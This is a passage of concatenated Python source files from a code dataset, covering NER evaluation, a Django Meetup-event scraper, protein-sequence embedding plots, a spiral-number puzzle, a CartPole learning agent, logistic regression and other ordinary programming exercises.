repo_name = urlparse(url).path.split('/')[-1]\n \n # Create a new directory to store the downloaded files on local computer\n if folder_name == None:\n folder_name = repo_name\n if not os.path.exists(folder_name):\n os.mkdir(folder_name)\n\n # Check if the directory is empty\n if not (len(os.listdir(folder_name)) == 0):\n raise Exception(\"The folder '\" + folder_name + \"' already exists and is not empty\")\n\n # Send a GET request to the repository URL and extract the HTML content\n response = requests.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n # Find all links to .mmif, .txt, .md and .ann files in the HTML content\n links = [a['href'] for a in soup.find_all('a', href=True) if a['href'].endswith(('.mmif', '.txt', '.md', '.ann'))]\n\n # Download each file in the links list into the created folder\n for link in links:\n raw_url = urljoin('https://raw.githubusercontent.com/', link.replace('/blob/', '/'))\n file_name = os.path.basename(link)\n file_path = os.path.join(folder_name, file_name)\n with open(file_path, 'wb') as file:\n response = requests.get(raw_url)\n file.write(response.content)\n \n\nif __name__ == \"__main__\":\n\n download(gold_url, gold_folder)\n download(test_url, test_folder)\n os.system(\"python evaluate.py \" + gold_folder + \"/ \" + test_folder + \"/ \" + resultpath)\n\n # edit the text file to add in the url paths to the github repos\n with open(resultpath, 'r') as fh_in:\n s = fh_in.read()\n s = (\"link containing gold-standard files: \" + gold_url + \"\\n\" +\\\n \"link containing model prediction files: \" + test_url + \"\\n\\n\" + s)\n with open(resultpath, 'w') as fh_out:\n fh_out.write(s)\n","repo_name":"JinnyViboonlarp/ner-evaluation","sub_path":"download_and_evaluate.py","file_name":"download_and_evaluate.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6164507315","text":"from django.contrib.gis.db import models\nfrom location_field.models.spatial import LocationField\nfrom .validators import *\nfrom django.db.models.signals import pre_save, post_save\nfrom django.dispatch import receiver\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom icalendar import Calendar\nfrom website.utils import retry_request\n\n\nclass MeetupGroup(models.Model):\n\n url = models.CharField(max_length=100, unique=True, validators=[validate_meetup_url_exists])\n name = models.CharField(max_length=100)\n is_blacklisted = models.BooleanField(default=False)\n location = models.PointField(null=True)\n\n class Meta:\n verbose_name_plural = \"Meetup Groups\"\n\n def __str__(self):\n return self.url\n\n\nclass TechEvent(models.Model):\n\n MEETUP = 'MU'\n EVENTBRITE = 'EB'\n ICAL = 'IC'\n CUSTOM = 'CU'\n\n SOURCE_CHOICES = (\n (MEETUP, 'Meetup.com'),\n (EVENTBRITE, 'EventBrite'),\n (ICAL, '.ics calendar'),\n (CUSTOM, 'Custom one-off event'),\n )\n\n uniqid = models.CharField(max_length=50, unique=True)\n name = models.CharField(max_length=255)\n url = models.URLField()\n begin_time = models.DateTimeField('begin time', db_index=True)\n source = models.CharField(max_length=2,\n choices=SOURCE_CHOICES,\n default=CUSTOM)\n meetup_group = models.ForeignKey(MeetupGroup,\n null=True,\n blank=True,\n on_delete=models.CASCADE)\n is_active = models.BooleanField(default=True)\n address = models.CharField(max_length=255)\n city = models.CharField(max_length=100, null=True)\n postal_code = models.CharField(max_length=20, null=True)\n country = models.CharField(max_length=50, null=True)\n location = LocationField(\n based_fields=['address', 'city', 'postal_code'],\n zoom=7,\n default='POINT (0.0 0.0)'\n )\n\n class Meta:\n verbose_name_plural = \"Events\"\n\n def __str__(self):\n return self.name\n\n\nclass ParseError(models.Model):\n\n created_at = models.DateField()\n error_message = models.TextField()\n payload = models.TextField()\n is_resolved = models.BooleanField(default=False)\n\n class Meta:\n verbose_name_plural = 'Firehose Parse Errors'\n\n def __str__(self):\n return self.error_message\n\n\n@receiver(pre_save, sender=MeetupGroup)\ndef meetup_group_pre_save(sender, instance, **kwargs):\n\n if instance.is_blacklisted is False:\n\n url = 'https://www.meetup.com/%s' % instance.url\n\n r = retry_request(url)\n\n html = BeautifulSoup(r.text, features=\"html.parser\")\n\n res = html.findAll('meta', attrs={\"property\": \"geo.position\"})\n (lat, lng) = res[0]['content'].split(';')\n\n instance.name = html.h1.a.text[:255]\n\n instance.location = 'POINT(%s %s)' % (lng, lat)\n\n\n@receiver(post_save, sender=MeetupGroup)\ndef meetup_group_post_save(sender, instance, **kwargs):\n \"\"\"\n Download the current calendar for meetup groups just added using the\n admin.\n \"\"\"\n\n # If the meetup group is blacklisted, then we should delete all related\n # tech events.\n if instance.is_blacklisted is True:\n TechEvent.objects.filter(meetup_group_id=instance.id).delete()\n\n else:\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36',\n }\n group_calendar_url = 'http://www.meetup.com/%s/events/ical/' % instance.url\n\n r = requests.get(group_calendar_url, headers=headers)\n c = Calendar.from_ical(r.text)\n\n for i in c.walk():\n if i.name == 'VEVENT':\n\n uniqid = i['UID'].replace('event_', '').\\\n replace('@meetup.com', '')\n (lat, lng) = i['GEO'].to_ical().split(';')\n\n updated_values = {\n 'begin_time': i.get('DTSTART').dt,\n 'url': i['URL'][:200],\n 'name': i['SUMMARY'],\n 'source': 'MU',\n 'meetup_group_id': instance.id,\n 'is_active': True,\n 'address': i.get('LOCATION', 'See event page for details')[:255],\n 'city': '',\n 'postal_code': '',\n 'country': '',\n 'location': 'POINT (%s %s)' % (lng, lat)\n }\n\n TechEvent.objects.update_or_create(\n uniqid=uniqid,\n defaults=updated_values)\n","repo_name":"undernewmanagement/3cosystem","sub_path":"src/apps/tech_events/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"14288713650","text":"def ReadFastaFile(filename):\n fileObj = open(filename, 'r')\n sequences = []\n seqFragments = []\n for line in fileObj:\n if line.startswith('>'):\n if seqFragments:\n sequence = ''.join(seqFragments)\n sequences.append(sequence)\n seqFragments = []\n else:\n seq = line.rstrip()\n seqFragments.append(seq)\n if seqFragments:\n sequence = ''.join(seqFragments)\n sequences.append(sequence)\n fileObj.close()\n return sequences\n#%% Lists of different protein family sequences. Each list has 200 seqs from Muscarinic acetylcholine receptor\n# Retinoid X receptor, and Retroviral VpR\n\nMAR = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/sequence(1).txt')\nRXR = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/sequence(2).txt')\nRVP = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/sequence(3).txt')\n\nBCCT = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/BCCT transporter family.txt')\nFMR = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/Flagellar M-ring protein(DNA).txt')\nMET = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/Metallothionein(DNA).txt')\n\nPorin = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/Porin_family.txt')\n\naquaPorin = ReadFastaFile(\"/home/research/Desktop/ARCC/cancerai/Aquaporin Z (all alphas).txt\")\nLamBPorin = ReadFastaFile(\"/home/research/Desktop/ARCC/cancerai/Porin, LamB-type (all betas).txt\")\noprBPorin = ReadFastaFile(\"/home/research/Desktop/ARCC/cancerai/oprB porin (mix of betas and alphas).txt\")\n\n\nMAR_seq = MAR[:500]\nRXR_seq = RXR[:500]\nRVP_seq = RVP[:500]\nBCCT_seq = BCCT[:500]\nFMR_seq = FMR[:500]\nMET_seq = MET[:500]\nPOR_seq = Porin[:500]\n\nseq = MAR_seq + RXR_seq + RVP_seq\nseq_2 = BCCT_seq + FMR_seq + MET_seq\nseq_3 = seq + seq_2 + POR_seq + aquaPorin + LamBPorin + oprBPorin\n\n#%% Deploy model on each protein family sequence:\n\nimport torch\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom genslm import GenSLM, SequenceDataset\n\ntorch.manual_seed(1)\n\nmodel = GenSLM(\"genslm_25M_patric\", model_cache_dir=\"/home/research/Desktop/ARCC/cancerai\")\n\ndevice = torch.device(\"cuda:0\")\nmodel = model.to(device)\nmodel.eval()\n\ndataset = SequenceDataset(seq_3, model.seq_length, model.tokenizer)\ndataloader = DataLoader(dataset, batch_size = 6, shuffle=False)\n\n# Compute averaged-embeddings for each input sequence\nembeddings = []\n\nwith torch.no_grad():\n for batch in dataloader:\n outputs = model(batch[\"input_ids\"].to(device), batch[\"attention_mask\"].to(device), output_hidden_states=True)\n # outputs.hidden_states shape: (layers, batch_size, sequence_length, hidden_size)\n emb = outputs.hidden_states[0].detach().cpu().numpy()\n # Compute average over sequence length\n emb = np.mean(emb, axis=1)\n embeddings.append(emb)\n torch.cuda.empty_cache()\n \n# Concatenate embeddings into an array of shape (num_sequences, hidden_size)\nembeddings = np.concatenate(embeddings)\nembeddings.shape\n#%%\n\n'''\nBelow are two versions of PCA on the embeddings. \n'''\n\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport pandas as pd\n#from mpl_toolkits import mplot3d\n#import mpld3\n\nPCA = PCA(n_components=3)\npca_proj = PCA.fit(embeddings)\nx = pca_proj.transform(embeddings) \n\n# build dataframe so that we can make the interactive plot:\ndf = pd.DataFrame({'x':x[:,0], 'y':x[:,1], 'z':x[:,2]})\n\nfig = plt.figure(dpi=100)\nax = plt.axes(projection='3d')\n\nax.scatter3D(x[:500,0], x[:500,1], x[:500,2], label='MAR', s=6, color='blue')\nax.scatter3D(x[500:1000,0], x[500:1000,1], x[500:1000,2], label='RXR', s=4, color='red')\nax.scatter3D(x[1000:1500,0], x[1000:1500,1], x[1000:1500,2], label='RVP', s=2, color='green')\nax.scatter3D(x[1500:2000,0], x[1500:2000,1], x[1500:2000,2], label='BCCT', s=2, color='purple')\nax.scatter3D(x[2000:2500,0], x[2000:2500,1], x[2000:2500,2], label='FMR', s=2, color='orange')\nax.scatter3D(x[2500:3000,0], x[2500:3000,1], x[2500:3000,2], label='MET', s=2, color='black')\n\n\nax.set_title('Protein Families: PCA on all embeddings at once') \nax.legend()\n\n#%%\nimport plotly.graph_objects as go\nfrom plotly.graph_objects import *\nimport plotly.express as px\n\nfig = go.Figure(data=[go.Scatter3d(\n x = x[:500,0],\n y = x[:500,1],\n z = x[:500,2],\n mode ='markers',\n name = 'Muscarinic Acetylcholine Receptor',\n marker = dict(\n size =1.5,\n color ='blue', \n )), \ngo.Scatter3d(\n x = x[500:1000,0],\n y = x[500:1000,1],\n z = x[500:1000,2],\n mode ='markers',\n name = 'Retroviral VpR',\n marker = dict(\n size = 1.5,\n color = 'red', \n )),\ngo.Scatter3d(\n x = x[1000:1500,0],\n y = x[1000:1500,1],\n z = x[1000:1500,2],\n mode ='markers',\n name = 'Retinoid X Receptor',\n marker = dict(\n size = 1.5,\n color ='green',\n )),\ngo.Scatter3d(\n x = x[1500:2000,0],\n y = x[1500:2000,1],\n z = x[1500:2000,2],\n mode ='markers',\n name = 'BCCT Transporter',\n marker = dict(\n size = 1.5,\n color ='purple', \n )),\ngo.Scatter3d(\n x = x[2000:2500,0],\n y = x[2000:2500,1],\n z = x[2000:2500,2],\n mode ='markers',\n name = 'Flagellar M-ring Protein (DNA)',\n marker = dict(\n size = 1.5,\n color ='orange',\n )),\ngo.Scatter3d(\n x = x[2500:3000,0],\n y = x[2500:3000,1],\n z = x[2500:3000,2],\n mode = 'markers',\n name = 'Metallothionein (DNA)',\n marker = dict(\n size = 1.5,\n color = 'black',\n )),\ngo.Scatter3d(\n x = x[3000:,0],\n y = x[3000:,1],\n z = x[3000:,2],\n mode = 'markers',\n name = 'Porin',\n marker = dict(\n size = 1.5,\n color = 'pink',\n )),\n ])\n\n# tight layout\nfig.update_layout(margin=dict(l=0, r=0, b=0, t=0))\nfig.write_html(\"/home/research/Desktop/ARCC/cancerai/figure1.html\") #Modifiy the html file\nfig.show()\n\n\n\n\n\n\n\n\n","repo_name":"cancer-ai/Embeddings","sub_path":"protein_families.py","file_name":"protein_families.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71250658386","text":"\"\"\"\nPrint numbers in a square spiral, starting from 1.\n\n>>> print(spiral_numbers(4))\n1 2\n4 3\n\n>>> print(spiral_numbers(9))\n7 8 9\n6 1 2\n5 4 3\n\n>>> print(spiral_numbers(25))\n21 22 23 24 25\n20 7 8 9 10\n19 6 1 2 11\n18 5 4 3 12\n17 16 15 14 13\n\n>>> print(spiral_numbers(40))\n 21 22 23 24 25 26\n 20 7 8 9 10 27\n40 19 6 1 2 11 28\n39 18 5 4 3 12 29\n38 17 16 15 14 13 30\n37 36 35 34 33 32 31\n\"\"\"\n\nfrom typing import Tuple, Dict\nfrom enum import Enum\n\n\nPos = Tuple[int, int]\n\n\nclass Dir(Enum):\n RIGHT = 0\n DOWN = 1\n LEFT = 2\n UP = 3\n\n\ndef turn_right(d: Dir) -> Dir:\n \"\"\"\n >>> turn_right(Dir.RIGHT)\n <Dir.DOWN: 1>\n \"\"\"\n return Dir((d.value + 1) % 4)\n\n\ndef one_forward(p: Pos, d: Dir):\n \"\"\"\n >>> one_forward((-1, -1), Dir.RIGHT)\n (0, -1)\n \"\"\"\n x, y = p\n if d == Dir.RIGHT:\n return (x + 1, y)\n elif d == Dir.DOWN:\n return (x, y + 1)\n elif d == Dir.LEFT:\n return (x - 1, y)\n elif d == Dir.UP:\n return (x, y - 1)\n\n\ndef spiral_numbers_grid(limit: int) -> Dict[Pos, int]:\n # Start with the number 1 already added.\n grid = {(0, 0): 1}\n pos = (0, 0)\n num = 1\n direction = Dir.UP\n\n # Always try to turn right, but if that fails, go straight.\n while num < limit:\n num += 1\n\n new_dir_1 = turn_right(direction)\n new_pos_1 = one_forward(pos, new_dir_1)\n\n new_dir_2 = direction\n new_pos_2 = one_forward(pos, direction)\n\n if new_pos_1 not in grid:\n pos = new_pos_1\n direction = new_dir_1\n elif new_pos_2 not in grid:\n pos = new_pos_2\n direction = new_dir_2\n\n grid[pos] = num\n\n return grid\n\n\ndef spiral_numbers(limit: int) -> str:\n # Generate a grid of numbers in a spiral.\n grid = spiral_numbers_grid(limit)\n\n # Iterate rows of the grid, printing each number. Print spaces if a number is missing.\n # Add padding to keep numbers aligned horizontally.\n min_x = min( x for (x, y) in grid.keys() )\n max_x = max( x for (x, y) in grid.keys() )\n min_y = min( y for (x, y) in grid.keys() )\n max_y = max( y for (x, y) in grid.keys() )\n\n max_digits = max( len(str(n)) for n in grid.values() )\n\n rows = []\n for y in range(min_y, max_y + 1):\n row = []\n for x in range(min_x, max_x + 1):\n n = grid.get((x, y))\n if n is None:\n row.append(' ' * max_digits)\n else:\n row.append('{:>{}d}'.format(n, max_digits))\n rows.append(row)\n\n return '\\n'.join( ' '.join(row) for row in rows )\n","repo_name":"christian-oudard/quiz_interview","sub_path":"spiral_numbers.py","file_name":"spiral_numbers.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39839084020","text":"import threading\nimport requests\n\ndef doget():\n requests.get(\"http://localhost:5000/\")\n print(\"did request\")\n\n\nthreads = []\nfor i in range(1, 101):\n t = threading.Thread(target=doget)\n threads.append(t)\nfor t in threads:\n t.start()\n","repo_name":"dat310-spring20/course-info","sub_path":"examples/python/flask/test/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"21881698499","text":"sortedMassData = []\r\nfor element in sortedMassData_temp: #loop to create float based storage type\r\n sortedMassData.append([float(element[0]), float(element[1]), float(element[2])])\r\n\r\ndef binarySearchInPeaks(item, item_index):\r\n alist = peaks\r\n first = 0\r\n last = len(alist)-1\r\n found = False\r\n while first<=last and not found:\r\n midpoint = (first + last)//2\r\n if abs(alist[midpoint] - item) <= 0.001:\r\n found = True\r\n elif (abs(item + 57.02146 - alist[midpoint]) < 0.001 and 'C' in SequenceArray[item_index[0]][item_index[1]]):\r\n found = True\r\n elif (abs(item + 15.99491 - alist[midpoint]) < 0.001 and 'M' in SequenceArray[item_index[0]][item_index[1]]):\r\n found = True\r\n else:\r\n if item > alist[midpoint]:\r\n last = midpoint-1\r\n else:\r\n first = midpoint+1\r\n return found\r\n\r\ndef binarySearchinSorted(item):\r\n alist = sortedMassData\r\n first = 0\r\n last = len(alist)-1\r\n found = False\r\n while first<=last and not found:\r\n midpoint = (first + last)//2\r\n if abs(alist[midpoint][0] - item) <= 0.001:\r\n found = True\r\n position = midpoint\r\n else:\r\n if item > alist[midpoint][0]:\r\n last = midpoint-1\r\n else:\r\n first = midpoint+1\r\n return [found, position]\r\n\r\nset1 = []\r\n\r\ndef SimpleSearchinPeaks(item, item_index): #returns if a particular peptide is there in the peaks\r\n found = False\r\n for peak in peaks:\r\n if abs(peak - item) <= 0.001:\r\n found = True\r\n elif abs(item + 57.02146 - peak) < 0.001 and 'C' in SequenceArray[item_index[0]][item_index[1]]:\r\n found = True\r\n elif abs(item + 15.99491 - peak) < 0.001 and 'M' in SequenceArray[item_index[0]][item_index[1]]:\r\n found = True\r\n return found\r\n\r\ndef main():\r\n for index1 in range(len(MassData)):\r\n print (index1, \", \", end = '')\r\n for index2 in range(len(MassData[index1])):\r\n if SimpleSearchinPeaks(MassData[index1][index2], [index1, index2]) == True:\r\n if MassData[index1] not in set1:\r\n set1.append([ProteinList[index1], SequenceArray[index1][index2], MassArray[index1][index2]])\r\n \"\"\"else:\r\n set1[set1.index(MassData[index1])].append(SequenceArray[index1][index2], MassArray[index1][index2])\"\"\"\r\n","repo_name":"garvitgoel/masters-thesis-peptide-mass-fingerprinting-algorithm","sub_path":"Core Modules/Protein Finder/ProteinFinder1.py","file_name":"ProteinFinder1.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27368806229","text":"import gym\nimport gym.spaces\nimport matplotlib\n# matplotlib.use(\"Agg\") # use noninteractive backend\nimport matplotlib.pyplot as plt\n\ngym.logger.set_level(40)\ngym.__version__\n\nimport autograd.numpy as np\nfrom autograd import grad, elementwise_grad\nimport random\n\n### Model ---------------------------------------------------------------------\n# Linear approximation function to expected returns\ndef approx(weights, observation, action):\n return np.dot(observation, weights)[action]\n\ndef policy(env, weights, observation, epsilon):\n actions = [0, 1]\n if np.random.rand() < epsilon:\n return random.choice(actions)\n\n qs = []\n for action in actions:\n qs.append(approx(weights, observation, action))\n return np.argmax(qs)\n\ndapprox = grad(approx)\ndiscount = 1.0 # Discount rate\nepsilon = 0.2 # Exploration rate\nalpha = 0.1 # Step size for gradient descent\nw = np.zeros((4,2)) # Initalize weigths\nnum_episodes = 1000 # Number of games for the agent to play\nmax_steps = 200\n\n### Plotting --------------------------------------------------------------------\nimport os\nimport tempfile\nimport subprocess\nanim_path = \"./monitor\"\nif not os.path.isdir(anim_path): os.makedirs(anim_path)\n\ndef save_frames(frames, anim_path):\n temp_dir = tempfile.mkdtemp(dir = anim_path)\n for i, frame in enumerate(frames[-200:]):\n plt.imsave(*(\"{}/{}.png\".format(temp_dir, i), frame),\n **{\"vmin\":0, \"vmax\":255})\n subprocess.run(\"ffmpeg -y -f image2 -i {0}/%d.png {0}/video.avi\".format(temp_dir),\n shell = True)\n subprocess.run(\"ffmpeg -y -i {}/video.avi -r 9 {}/anim.gif\".format(temp_dir, anim_path),\n shell = True)\n\n os.rmdir(temp_dir)\n\n\n### Training ------------------------------------------------------------------\nfrom collections import deque\nfrom gym import wrappers\n\nenv = gym.make('CartPole-v0')\nepisode_rewards = []\nfor ep in range(num_episodes):\n state = env.reset()\n rewards = []\n frames = deque(maxlen = 500)\n for _ in range(max_steps):\n # Take smart action based on defined policy\n action = policy(env, w, state, epsilon)\n\n q_hat = approx(w, state, action)\n q_hat_grad = dapprox(w, state, action)\n next_state, reward, done, _ = env.step(action)\n rewards.append(reward)\n # Render into buffer.\n visframe = env.render(mode = 'rgb_array')\n frames.append(visframe)\n if done:\n w += alpha*(reward - q_hat) * q_hat_grad\n break\n else:\n # Update weights to maximize for reward\n next_action = policy(env, w, next_state, epsilon)\n q_hat_next = approx(w, next_state, next_action)\n w += alpha*(reward - discount*q_hat_next)*q_hat_grad\n state = next_state\n # Reguralizer\n # as we learn more about the game, become more certain in making decision\n if ep == 100:\n epsilon /= 2\n\n episode_rewards.append(np.sum(rewards))\n mean_reward=np.mean(episode_rewards[max(ep-100, 0):ep+1])\n\n # Report on progress - did we solve the task already?\n if mean_reward >= 195.0 and ep >= 100:\n print(\"Episodes before solve {}\".format(ep-100+1))\n save_frames(frames, anim_path)\n break\n if ((ep % 100) == 0) and ep > 0:\n print(\"Episode {}/{} finished. Mean reward over last 100 episodes: {:.2f}\"\\\n .format(ep, num_episodes, (mean_reward)))\nenv.close()\n","repo_name":"martinholub/demos-blogs-examples","sub_path":"rl-gym/cartpole/cartpole_simple.py","file_name":"cartpole_simple.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6472181593","text":"# A binary adder calculator.\n# By: Rafael Sanchez\n\nimport sys\n\ndef parse_line(bin_string):\n return bin_string.replace('\\n','').split(',')\n\ndef turn_to_int_array(str_num):\n int_arr = []\n for i in range(0, len(str_num)):\n int_arr.append(int(str_num[i]))\n int_arr.reverse()\n return int_arr\n\ndef addBinaryHelper(num1, num2, carry):\n if (num1 == [] or num2 == []) and carry == 1:\n return [carry]\n if (num1 == [] or num2 == []) and carry == 0:\n return []\n if num1[0] + num2[0] + carry == 0:\n return [0] + addBinaryHelper(num1[1:], num2[1:], 0)\n if num1[0] + num2[0] + carry == 1:\n return [1] + addBinaryHelper(num1[1:], num2[1:], 0)\n if num1[0] + num2[0] + carry == 2:\n return [0] + addBinaryHelper(num1[1:], num2[1:], 1)\n if num1[0] + num2[0] + carry == 3:\n return [1] + addBinaryHelper(num1[1:], num2[1:], 1)\n\ndef addBinary(num1, num2):\n if len(num1) == len(num2):\n return addBinaryHelper(num1, num2, 0)\n if len(num1) < len(num2):\n EditedNum1 = num1 + ([0]*(len(num2)-len(num1)))\n return addBinaryHelper(EditedNum1, num2, 0)\n if len(num1) > len(num2):\n EditedNum2 = num2 + ([0]*(len(num1)-len(num2)))\n return addBinaryHelper(num1, EditedNum2, 0)\n\ndef concat(arr):\n for i in range(0, len(arr)):\n if arr[i] == 0:\n arr[i] = -1\n if arr[i] == 1:\n break;\n result_str = \"\"\n for i in range(0, len(arr)):\n if arr[i] == -1:\n continue\n else:\n result_str = result_str + str(arr[i])\n return result_str\n\nprint(\"Enter two binary numbers separated by commas (Ex: 010,110): \")\n\nfor line in sys.stdin:\n bin_pair = parse_line(line)\n int_array_0 = turn_to_int_array(bin_pair[0])\n int_array_1 = turn_to_int_array(bin_pair[1])\n result = addBinary(int_array_0,int_array_1)\n result.reverse()\n fin = concat(result)\n if (fin == \"\"):\n fin = \"0\"\n print(\"Addition result: \" + fin)\n \n \n\n\n","repo_name":"rsanche4/School-Projects","sub_path":"Projects for CS-115/binary_adder.py","file_name":"binary_adder.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14028614863","text":"import numpy as np\nfrom sklearn import preprocessing\nfrom sklearn import datasets\n\n\nclass LogisticRegression:\n def __init__(self, learning_rate=0.1, lamb=0.001, iters=1000, kernel='sigmoid'):\n self.learning_rate = learning_rate # 学习速率,默认值为1\n self.lamb = lamb # 正则化参数,默认值为1\n self.iters = iters # 最大迭代次数\n self.kernel = kernel # 内核函数,sigmoid或者softmax\n self.theta = np.zeros((1, 1)) # 声明参数是二维array格式\n self.cost = [] # 记录损失值\n\n @staticmethod\n def sigmoid(features, theta):\n \"\"\"\n 逻辑函数,用于二元分类,数据集均为np.array格式\n :param features: 特征集m*(n+1),m为样本数,n为特征数\n :param theta: 参数集k*(n+1),k为标签的类别数,n为特征数\n :return: 函数计算结果\n \"\"\"\n inner = np.dot(features, theta.T) # 计算内核\n return 1 / (1 + np.exp(-inner))\n\n @staticmethod\n def softmax(features, theta):\n \"\"\"\n softmax函数,用于多元分类,数据集均为np.array格式\n :param features: 特征集m*(n+1),m为样本数,n为特征数\n :param theta: 参数集k*(n+1),k为标签的类别数,n为特征数\n :return: 函数计算结果\n \"\"\"\n inner = features.dot(theta.T)\n return np.exp(inner) / np.sum(np.exp(inner), axis=1, keepdims=True) # inner的格式为m*k,如此设置np.sum的参数,可使按行相加后的结果m*1\n\n def cal_cost(self, features, target, theta, lamb):\n \"\"\"\n 计算损失函数(对数损失),使用L2正则化\n :param features: 特征集m*(n+1),m为样本数,n为特征数\n :param target: 目标集m*k,k为类别数\n :param theta: 参数集k*(n+1),k为标签的类别数,n为特征数\n :param lamb: 正则化参数,默认值为1\n :return: 对数损失\n \"\"\"\n m = features.shape[0] # 样本数\n if self.kernel == 'sigmoid':\n inner = self.sigmoid(features, theta) # softmax和sigmoid的损失函数格式上一致\n else:\n inner = self.softmax(features, theta)\n first = np.multiply(-target, np.log(inner)) # 前半部分\n second = np.multiply((1 - target), np.log(1 - inner)) # 后半部分\n reg = lamb / (2 * m) * np.sum(np.power(theta[:, 1:], 2)) # 正则化\n return np.sum(first - second) / m + reg\n\n def training(self, features, target):\n \"\"\"\n 使用批量梯度下降算法优化\n :param features: 特征集m*n,m为样本数,n为特征数\n :param target: 目标集m*k,k为类别数\n :return: 更新参数和损失值,无返回\n \"\"\"\n features = np.insert(features, 0, 1, axis=1) # 特征集增加一列x0,且令x0=1,以便于矩阵运算\n m, n = features.shape\n k = target.shape[1] # 目标类别数\n self.theta = np.zeros((k, n)) # 此时n=特征数+1\n for _ in range(self.iters): # 梯度下降\n if self.kernel == 'sigmoid':\n inner = self.sigmoid(features, self.theta)\n else:\n inner = self.softmax(features, self.theta)\n\n error = inner - target # 误差\n grad = error.T.dot(features) / m + self.lamb / m * self.theta # 计算梯度\n grad[:, 0] = np.sum(error, axis=0) / m # 上一步对所有theta都进行了正则化,这一步重新计算theta0的梯度,以取消正则化\n self.theta -= self.learning_rate * grad # 更新theta\n self.cost.append(self.cal_cost(features, target, self.theta, self.lamb)) # 添加当前损失值\n return\n\n def predict(self, features, threshold=0.5):\n \"\"\"\n 根据输入特征集和参数theta,输出预测值\n :param features: 待测样本1*n,n为特征数\n :param threshold: 阀值,默认值为0.5,大于0.5输出正类别,反之负类别.仅当kernel=sigmoid时使用\n :return: 若kernel=sigmoid,输出1或0(表示正类别或负类别);若干kernel=softmax,输出概率最大类别的索引,m*1\n \"\"\"\n features = np.insert(features, 0, 1, axis=1)\n if self.kernel == 'sigmoid':\n inner = self.sigmoid(features, self.theta)\n return [1 if i[0] >= threshold else 0 for i in inner]\n else:\n inner = self.softmax(features, self.theta)\n return np.argmax(inner, axis=1) # 概率最大类别的索引\n\n\ndef test_sigmoid(): # 使用sklearn生成的双类别数据测试sigmoid\n features, target = datasets.make_classification(n_samples=300)\n target = target.reshape(target.shape[0], 1)\n\n lr = LogisticRegression()\n lr.training(features, target)\n predict = lr.predict(features) # 获取最大预测索引\n correct = [0 if a ^ b else 1 for a, b in zip(predict, target)]\n accuracy = correct.count(1) / len(correct) # 计算准确度\n print('accuracy={}%'.format(accuracy * 100))\n\n\ndef test_softmax():\n \"\"\"使用鸢尾花进行测试的时候,可以做到93%的预测准确率\n 使用sklearn生成的多类别数据测试softmax,当类别增多时,准确率迅速下降,原因可能是生成的数据不存在良好的线性关系\n \"\"\"\n # features, target = datasets.make_classification(n_samples=5000, n_informative=4, n_classes=5)\n dataset = datasets.load_iris() # 鸢尾花数据集\n features, target = dataset['data'], dataset['target']\n target = target.reshape(-1, 1)\n enc = preprocessing.OneHotEncoder()\n target_train = enc.fit_transform(target).toarray() # 对目标集独热编码\n\n lr = LogisticRegression(learning_rate=0.001, lamb=0, iters=5000, kernel='softmax')\n lr.training(features, target_train)\n predict = lr.predict(features)\n correct = [1 if a == b else 0 for a, b in zip(predict, target)] # 本例中,索引值正好等于原数据\n accuracy = correct.count(1) / len(correct)\n print('accuracy={}%'.format(accuracy * 100))\n\n\ntest_sigmoid()\ntest_softmax()\n","repo_name":"FanziSufu/Simple-ML","sub_path":"LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1019344467","text":"\"\"\"\npython3\n-- coding: utf-8 --\n-------------------------------\n@Author : RAO ZHI\n@Email : raozhi@mails.cust.edu.cn\n-------------------------------\n@File : Semantic Segmentation.py\n@Software : PyCharm\n@Time : 2023/4/26 19:05\n-------------------------------\n\"\"\"\n\nimport warnings\n\nfrom matplotlib import pyplot as plt\n\nwarnings.filterwarnings('ignore')\nwarnings.simplefilter('ignore')\nfrom torchvision.models.segmentation import deeplabv3_resnet50\nimport torch\nimport torch.functional as F\nimport numpy as np\nimport requests\nimport torchvision\nfrom PIL import Image\nfrom pytorch_grad_cam.utils.image import show_cam_on_image, preprocess_image\n\n# image_url = \"https://farm1.staticflickr.com/6/9606553_ccc7518589_z.jpg\"\n# image = np.array(Image.open(requests.get(image_url, stream=True).raw))\n\nimage_path = \"9606553_ccc7518589_z.jpg\"\nimage = np.array(Image.open(image_path))\n\nrgb_img = np.float32(image) / 255\ninput_tensor = preprocess_image(rgb_img,\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n# Taken from the torchvision tutorial\n# https://pytorch.org/vision/stable/auto_examples/plot_visualization_utils.html\nmodel = deeplabv3_resnet50(pretrained=True, 